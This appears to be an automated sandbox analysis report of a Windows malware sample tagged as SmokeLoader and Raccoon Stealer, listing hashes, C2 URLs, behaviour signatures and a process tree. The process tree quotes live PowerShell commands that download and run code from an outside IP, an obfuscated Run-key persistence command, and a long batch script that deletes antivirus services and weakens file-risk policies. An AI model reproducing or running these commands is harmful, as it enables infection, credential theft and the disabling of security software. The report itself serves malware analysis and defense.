Analysis
-
max time kernel
151s -
max time network
136s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-08-2021 06:46
Static task
static1
Behavioral task
behavioral1
Sample
bfa14859432cc51e9f8a9b632dc38713.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
bfa14859432cc51e9f8a9b632dc38713.exe
Resource
win10v20210408
General
-
Target
bfa14859432cc51e9f8a9b632dc38713.exe
-
Size
302KB
-
MD5
bfa14859432cc51e9f8a9b632dc38713
-
SHA1
b76262d0b04a555f9ddbef1e3f8a99fe8bf50f5f
-
SHA256
940856f93e56ecd69b6833c94a78247b3f8d60348ac9b73928fd338113fbbc9e
-
SHA512
92df1e4440a47ac40a7a32fcd064632b4ca414e85a8b607d53dee0c95980159db198aff55247a73df59914eb0db4828685d5d21a0659ead1674d252bc9ac01d9
Malware Config
Extracted
http://91.241.19.52/Api/GetFile2
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
raccoon
83fbe81dd43f775dd8af3cd619f88f428fbd9a96
-
url4cnc
https://telete.in/opa4kiprivatem
Signatures
-
Raccoon Stealer Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/492-128-0x00000000048E0000-0x0000000004973000-memory.dmp family_raccoon behavioral2/memory/492-129-0x0000000000400000-0x0000000002CB4000-memory.dmp family_raccoon -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 45 996 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
693A.exe6EF8.exeRuntimebroker.exe4J0sUZK11d.exesqlcmd.exepid process 1332 693A.exe 492 6EF8.exe 1548 Runtimebroker.exe 2644 4J0sUZK11d.exe 3632 sqlcmd.exe -
Deletes itself 1 IoCs
Processes:
pid process 2180 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 5 IoCs
Processes:
6EF8.exepid process 492 6EF8.exe 492 6EF8.exe 492 6EF8.exe 492 6EF8.exe 492 6EF8.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.2'+'41'+'.19.5'+'2/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
bfa14859432cc51e9f8a9b632dc38713.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfa14859432cc51e9f8a9b632dc38713.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfa14859432cc51e9f8a9b632dc38713.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bfa14859432cc51e9f8a9b632dc38713.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2436 schtasks.exe 2216 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 580 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
bfa14859432cc51e9f8a9b632dc38713.exepid process 996 bfa14859432cc51e9f8a9b632dc38713.exe 996 bfa14859432cc51e9f8a9b632dc38713.exe 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 2180 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2180 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
bfa14859432cc51e9f8a9b632dc38713.exepid process 996 bfa14859432cc51e9f8a9b632dc38713.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3276 powershell.exe Token: SeDebugPrivilege 996 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeShutdownPrivilege 2180 Token: SeCreatePagefilePrivilege 2180 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2180 -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
693A.exeRuntimebroker.exepowershell.exe6EF8.execmd.exe4J0sUZK11d.exesqlcmd.exedescription pid process target process PID 2180 wrote to memory of 1332 2180 693A.exe PID 2180 wrote to memory of 1332 2180 693A.exe PID 2180 wrote to memory of 1332 2180 693A.exe PID 2180 wrote to memory of 492 2180 6EF8.exe PID 2180 wrote to memory of 492 2180 6EF8.exe PID 2180 wrote to memory of 492 2180 6EF8.exe PID 1332 wrote to memory of 1548 1332 693A.exe Runtimebroker.exe PID 1332 wrote to memory of 1548 1332 693A.exe Runtimebroker.exe PID 1332 wrote to memory of 1548 1332 693A.exe Runtimebroker.exe PID 1548 wrote to memory of 3276 1548 Runtimebroker.exe powershell.exe PID 1548 wrote to memory of 3276 1548 Runtimebroker.exe powershell.exe PID 1548 wrote to memory of 3276 1548 Runtimebroker.exe powershell.exe PID 1548 wrote to memory of 996 1548 Runtimebroker.exe powershell.exe PID 1548 wrote to memory of 996 1548 Runtimebroker.exe powershell.exe PID 1548 wrote to memory of 996 1548 Runtimebroker.exe powershell.exe PID 996 wrote to memory of 2020 996 powershell.exe powershell.exe PID 996 wrote to memory of 2020 996 powershell.exe powershell.exe PID 996 wrote to memory of 2020 996 powershell.exe powershell.exe PID 996 wrote to memory of 2648 996 powershell.exe cmd.exe PID 996 wrote to memory of 2648 996 powershell.exe cmd.exe PID 996 wrote to memory of 2648 996 powershell.exe cmd.exe PID 492 wrote to memory of 2644 492 6EF8.exe 4J0sUZK11d.exe PID 492 wrote to memory of 2644 492 6EF8.exe 4J0sUZK11d.exe PID 492 wrote to memory of 2644 492 6EF8.exe 4J0sUZK11d.exe PID 492 wrote to memory of 2304 492 6EF8.exe cmd.exe PID 492 wrote to memory of 2304 492 6EF8.exe cmd.exe PID 492 wrote to memory of 2304 492 6EF8.exe cmd.exe PID 2304 wrote to memory of 580 2304 cmd.exe timeout.exe PID 2304 wrote to memory of 580 2304 cmd.exe timeout.exe PID 2304 wrote to memory of 580 2304 cmd.exe timeout.exe PID 2644 wrote to memory of 2216 2644 4J0sUZK11d.exe schtasks.exe PID 2644 wrote to memory of 2216 2644 4J0sUZK11d.exe schtasks.exe PID 2644 wrote to memory of 2216 2644 4J0sUZK11d.exe schtasks.exe PID 3632 wrote to memory of 2436 3632 sqlcmd.exe schtasks.exe PID 3632 wrote to memory of 2436 3632 sqlcmd.exe schtasks.exe PID 3632 wrote to memory of 2436 3632 sqlcmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bfa14859432cc51e9f8a9b632dc38713.exe"C:\Users\Admin\AppData\Local\Temp\bfa14859432cc51e9f8a9b632dc38713.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\693A.exeC:\Users\Admin\AppData\Local\Temp\693A.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.2''+''41''+''.19.5''+''2/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )4⤵
-
C:\Users\Admin\AppData\Local\Temp\6EF8.exeC:\Users\Admin\AppData\Local\Temp\6EF8.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe"C:\Users\Admin\AppData\Local\Temp\4J0sUZK11d.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6EF8.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"2⤵
- Creates scheduled task(s)
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
21b0c600acd7a7f957e3387f9a5c5aad
SHA1297472985636d9bb5154992f4ad1e83bbdc821fe
SHA256bd098349f7261ffae0cb0de33590d68730c7fd05eeb046ec7f3b4484a2b1cecb
SHA5123d26fcb6a9aa64ae12ee8fbbe05a16fd5199c4b626e6fce321726aa03a249315f05500378487e847ca28d670326b17f915a8e8fb7f5ed7ed9cb67ce6120f815e
-
C:\ProgramData\Runtimebroker.exeMD5
21b0c600acd7a7f957e3387f9a5c5aad
SHA1297472985636d9bb5154992f4ad1e83bbdc821fe
SHA256bd098349f7261ffae0cb0de33590d68730c7fd05eeb046ec7f3b4484a2b1cecb
SHA5123d26fcb6a9aa64ae12ee8fbbe05a16fd5199c4b626e6fce321726aa03a249315f05500378487e847ca28d670326b17f915a8e8fb7f5ed7ed9cb67ce6120f815e
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
6bf0e5945fb9da68e1b03bdaed5f6f8d
SHA1eed3802c8e4abe3b327c100c99c53d3bbcf8a33d
SHA256dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1
SHA512977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9c124072f58bbb02dec8580b37ec090c
SHA196328890ba89b73a6ff28e3a2b0cc75e8e67d868
SHA2565b6cff6a25e4e4e8939c8026a0e76f7cd1987c873fc403d5be1c9a2f9252938f
